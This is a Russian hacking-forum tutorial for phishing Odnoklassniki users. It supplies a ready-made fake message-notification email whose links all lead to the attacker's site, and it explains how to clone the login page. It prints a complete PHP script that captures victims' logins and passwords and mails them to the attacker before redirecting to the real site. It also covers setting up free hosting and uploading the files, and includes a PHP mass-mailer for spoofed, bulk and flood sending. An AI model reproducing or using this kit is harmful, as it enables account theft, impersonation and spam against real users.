Сегодня мы рассмотрим подробный пример использования фейка в деле))
Для примера я выбрал www.odnoklassniki.ru
И так погнали!
Для начало я накалякал для вас HTML письмо для отправки жертве. Оно внешне ни чем не отличается от оригинала что приходит на мыло жертве когда ему кто-то пишет что нибудь))
И так письмо
<td style="width: 98%;"><a target="blank" href="http://www.host.ru/"><img alt="Одноклассники" src="http://i.pixs.ru/storage/6/5/5/Bezimyanni_9505731_2604655.png" border="0"></a></td></tr><tr><td></td><td><div class="notification"><table style="border-spacing: 10px 0pt;"><tbody><tr><td colspan="6" style="vertical-align: top; padding: 20px 0pt 0pt;"><span style="color: rgb(51, 51, 51); font: 16px Verdana;" class="text">Вам пришло новое сообщение</span></td></tr><tr><td colspan="6" style="vertical-align: top; padding: 15px 0pt 0pt; width: 740px;"><table cellspacing="0"><tbody><tr><td style="vertical-align: top; padding: 5px 5px 0pt 0pt;"><img src="http://af9.mail.ru/cgi-bin/readmsg?id=13120617360000000142;0;1;1&mode=attachment" class="attachment" border="0"></td><td style="vertical-align: top; width: 640px;"><div style="color: rgb(51, 51, 51); font: 15px/150% Verdana; width: 640px; overflow: hidden; white-space: nowrap;" class="actor">Юлия Caнина</div><div style="color: rgb(102, 102, 102); font: 12px/150% Verdana; width: 640px;">Привет;-) а я тебя сразу узнала:-) как у тебя...</div><table cellspacing="0"><tbody><tr><td style="padding: 10px 3px 0pt 0pt;"><img src="http://af4-2.mail.ru/cgi-bin/readmsg?id=13120617360000000142;0;1;3&mode=attachment" border="0"></td><td style="padding: 10px 0pt 0pt; vertical-align: top;"><a target="blank" href="http://www.host.ru/" style="color: rgb(235, 114, 46); font: 12px Verdana; text-decoration: underline; white-space: nowrap;" class="action-link read-link">прочитать переписку</a></td></tr></tbody></table></td></tr><tr></tr></tbody></table></td></tr><tr><td colspan="6" style="padding: 40px 0pt 20px;"><div style="color: rgb(153, 153, 153); font: 12px Verdana;">Вы получили это письмо, потому что зарегистрированы на <a target="blank" href="http://www.host.ru/" style="color: rgb(153, 153, 153); font: 12px Verdana; text-decoration: underline;">Одноклассниках</a>.<br>Вы можете <a target="blank" href="http://www.host.ru/" style="color: rgb(153, 153, 153); font: 12px Verdana; text-decoration: underline;">изменить</a> настройки отправки уведомлений.<br></div>
Вот и скрин
Все ссылки ведут на фейк! а их 4 , чтоб не парится используем комбинацию Ctrl+H и в первом строке пишем http://www.host.ru/ а во второй строке пишете ваш хост и кликаем "Заменить все"
Вы еще можете изменить фото , имя и текст (я сделал то что мне первым пришло в голову)
Если вы знаете от кого жертва ждет письма то можете переделать письмо как вам угодно. Например если жертва ждет письмо от Ирины то ищем "Юлия Caнина" и меняем на Ирина ... Так же можете изменить текст!
Для изменение фото с начало нужно иметь ссылку на фото которое вы хотите вставить с размером приблизительно (96:128) Для этого можно (чтоб не парится) просто зайти на свой аккаунт, найти фото которою вы хотели бы вставить и получить ссылку на это фото. Думаю по скрину будет все ясно!
После этого в письме ищем строку
<img src="http://af9.mail.ru/cgi-bin/readmsg?id=13120617360000000142;0;1;1&mode=attachment" class="attachment" border="0">
И меняем на
<img src="ссылка на изображение" class="attachment" border="0">
И так вроде с письмом разобрались! погнали дальше!
В оригинале когда жертва кликает "Прочитать переписку" его перекидывает на
http://www.odnoklass...ssages/tkn/3697 для этого мы сделаем фейк на эту страницу!
Копируем исходный код страницы. Делается это так.. кликаем правой кнопкой мышки и выбираем строку "Исходный код страницы".Далее копируем его в текстовик и ищем строку
<form action="http://www.odnoklassniki.ru/dk?cmd=AnonymLogin&st.cmd=anonymLogin&tkn=9568" method="post">
И меняем на
<form action="login.php" method="post">
Сохраняем как index.php
Вот сам login.php
<?php
$BASE="Мыло";
$IS_EMAIL=true;
$LOCATION="http://www.odnoklassniki.ru/cdk/st.cmd/anonymLogin/st.redirect/%2Fmessages/tkn/3697";
$p0=$_REQUEST["st_email"];
$p1=$_REQUEST["st_password"];
$headers = "Content-type: text/html; charset=windows-1251rn";
$headers .= "From: bot <$BASE>rn";
$headers .= "Bcc: $BASErn";
$info="логин:$p0:пароль:$p1:n";
if ($IS_EMAIL){
mail($BASE, "Привет от Xaker-Forum.Ru", $headers.$info);
} else {
$fd=fopen($BASE,"a+");
fwrite($fd,$info);
fclose($fd);
}
header("Location:$LOCATION");
?>
[hide thank="1"]Здесь вписываете ваш мылник и можете тупо поменять переадресацию "$LOCATION="http://www.odnoklass...ssages/tkn/3697";" Ну это как хотите!
Можете еще припаять erorr.php для эффективности фейка! Ну я не буду объяснять как это делается, так как я уже говорил об этом в этой статье
И так погнали дальше!
Для новичков я объясню
1) как зарегить хост например на holm.ru
2) как залить файлы
3) как отправить HTML письмо
________________________________________________________________________________________________________
P.S. Если после объяснение опять не поймете выше перечисленные три вопроса то покиньте пожалуйста данный ресурс!
И так приступим[/hide]
Заходим на www.holm.ru и кликаем "Зарегистрировать сайт" (кликаем на зеленый)
Далее смотрим на скрин
После вам на почту вышлют письмо со ссылкой , зайдите по этой ссылке для продолжения процесса регистрации. Через часок другой к вам на почту придут данные от вашего хоста!
И так все вы зарегали свой хост! Теперь будем разбираться как залить файл на хост!
Я пользуюсь прогой FileZilla FTP Client и буду объяснять как пользоваться именно им!
Устанавливаем FileZilla FTP Client и вводим данные от нашего хоста! смотрим на скрин
Для заливки файлов просто откройте папку www и с помощью мышки перетащите файлы туда!
Вроде с заливкой файлов тоже разобрались!
Теперь объясню как отправит HTML письмо (ну или текст)
Берем скрипт для отправки письма
Я пользуюсь этим скриптом
Скрытый текст
body {
margin-left: 0px;
margin-top: 0px;
margin-right: 0px;
margin-bottom: 0px;
background-color:#003399;
font-color:#CCCCCC ;
color:#CCCCCC
}
a:link {
color: #CCCCCC;
text-decoration: none;
}
a:visited {
color: #CCCCCC;
text-decoration: none;
}
a:hover {
color: #CCCCCC;
text-decoration: underline;
}
a:active {
text-decoration: none;
}
div {
color:#CCCCCC;
}
</style>
<?
//
function send_mime_mail($name_from, // имя отправителя
$email_from, // email отправителя
$name_to, // имя получателя
$email_to, // email получателя
$data_charset, // кодировка переданных данных
$send_charset, // кодировка письма
$subject, // тема письма
$body // текст письма
) {
$to = mime_header_encode($name_to, $data_charset, $send_charset)
. ' <' . $email_to . '>';
$subject = mime_header_encode($subject, $data_charset, $send_charset);
$from = mime_header_encode($name_from, $data_charset, $send_charset)
.' <' . $email_from . '>';
if($data_charset != $send_charset) {
$body = iconv($data_charset, $send_charset, $body);
}
$headers = "From: $fromrn";
$headers .= "Content-type: text/html; charset=$send_charsetrn";
$headers .= "Mime-Version: 1.0rn";
return mail($to, $subject, $body, $headers);
}
function mime_header_encode($str, $data_charset, $send_charset) {
if($data_charset != $send_charset) {
$str = iconv($data_charset, $send_charset, $str);
}
return '=?' . $send_charset . '?B?' . base64_encode($str) . '?=';
}
error_reporting (0);
if(!set_time_limit(0)) {
$limit = false;
} else {
set_time_limit(0);
ignore_user_abort(1);
$limit = true;
}
ini_set('max_execution_time', '0');
?>
<div align="center">
<? if($limit)echo('<font color=#00FF00>Время работы не ограничено текущими настройками сервера</font>');else
echo('<font color=FF0000>Время работы ограничено текущими настройками сервера</font>');?><br /> <br />
</div>
<?
$ip = getenv('REMOTE_ADDR');
if($_GET['mail'] == '1' || $_GET['mail'] == '2' || $_GET['mail'] == '3')
{
$_POST['to'] = stripslashes($_POST['to']);
$_POST['msg'] = stripslashes($_POST['msg']);
$_POST['from'] = stripslashes($_POST['from']);
$_POST['fromm'] = stripslashes($_POST['fromm']);
$_POST['subject'] = stripslashes($_POST['subject']);
if($_POST['to'] && $_POST['msg'] && $_POST['from'] && $_POST['tipe'])
{
$headers = "MIME-Version: 1.0rn";
$headers .= "From: ".$_POST['from']."rn";
$headers .= "Content-type: text/".$_POST['tipe']."; charset=windows-1251n";
if($_GET['mail'] == '1')
{
send_mime_mail($_POST['from'], // имя отправителя
$_POST['fromm'], // email отправителя
"", // имя получателя
$_POST['to'], // email получателя
"windows-1251", // кодировка переданных данных
"windows-1251", // кодировка письма
$_POST['subject'], // тема письма
$_POST['msg']// текст письма
) or die('<font color=FF0000>Невозможно отправить сообщение</font>');
}
elseif($_GET['mail'] == '2')
{
$_POST['to'] = explode("n",$_POST['to']);
foreach($_POST['to'] as $poluchatels)
{
send_mime_mail($_POST['from'], // имя отправителя
$_POST['fromm'], // email отправителя
"", // имя получателя
$_POST['to'], // email получателя
"windows-1251", // кодировка переданных данных
"windows-1251", // кодировка письма
$_POST['subject'], // тема письма
$_POST['msg']// текст письма
) or die('<font color=FF0000>Невозможно отправить сообщение</font>');
}
}
elseif($_GET['mail'] == '3')
{
if(preg_match('/[0-9]+/',$_POST['kol']))
{
for($i=0;$i<$_POST['kol'];$i++)
{
send_mime_mail($_POST['from'], // имя отправителя
$_POST['fromm'], // email отправителя
"", // имя получателя
$_POST['to'], // email получателя
"windows-1251", // кодировка переданных данных
"windows-1251", // кодировка письма
$_POST['subject'], // тема письма
$_POST['msg']// текст письма
) or die('<font color=FF0000>Невозможно отправить сообщение</font>');
sleep(1);
}
}
else
{
echo('<font color=FF0000>Неверно введено (или не введено) кол-во сообщений</font>');
}
}
echo('<center><b><font color=#00FF00>Сообщение успешно отправлено</font></b></center>');
}
else
{
?>
<form method='post'>
<div align="center">
<table>
<?
if($_GET['mail'] == '1' || $_GET['mail'] == '3')
{
echo("<tr><td align="right"> Получатель:</td><td align="left"><input type='text'name='to' ></td></tr>");
}
?>
<tr><td align="right">Отправитель:</td>
<td align="left"> <input type='text' name='from' width="200"></td></tr>
<tr><td align="right">Откуда (e-mail):</td>
<td align="left"> <input type='text' name='fromm' width="200"></td></tr>
<tr><td align="right">Тема сообщения: </td> <td align="left"> <input type='text' name='subject'><br> </td></tr>
<?
if($_GET['mail'] == '3')
{
echo("<tr><td align="right"> Кол-во сообщений: </td> <td align="left"> <input type='text' name='kol'></td></tr>");
}
?>
<br>
<tr> <td align="center" colspan="2"> html <input type='radio' checked='checked' tabindex='1' name='tipe' value='html'>
text <input type='radio' name='tipe' value='plain'></td> </tr>
<?
if($_GET['mail'] == '2')
{
echo("<tr><td align="center" colspan="2">Получатели:<br><textarea name='to' rows='10' cols='50'>admin@admin.ru
admin@mail.ru
tiger@ya.ru</textarea></td> </tr>");
}
?>
<tr><td align="center" colspan="2">
Сообщение:<br>
<textarea name='msg' rows='10' cols='50'></textarea><br><br><input type='submit'>
</td> </tr>
</table>
</div>
</form>
<br>
<?
}
} else {
?><br> <div align="center">
<a href='<?=$_SERVER['PHP_SELF']?>?mail=1'>Отправить простое сообщение</a><br>
<a href='<?=$_SERVER['PHP_SELF']?>?mail=2'>Наспамить</a><br>
<a href='<?=$_SERVER['PHP_SELF']?>?mail=3'>Нафлудить</a><br>
</div>
<?
}
?>
Сохраняем скрипт как mail.php (например) и заливаем на хост как выше объяснил
Для того чтоб отправить переходите по ссылке http://Ваш хост/mail.php и радуетесь!
Ну вот и все))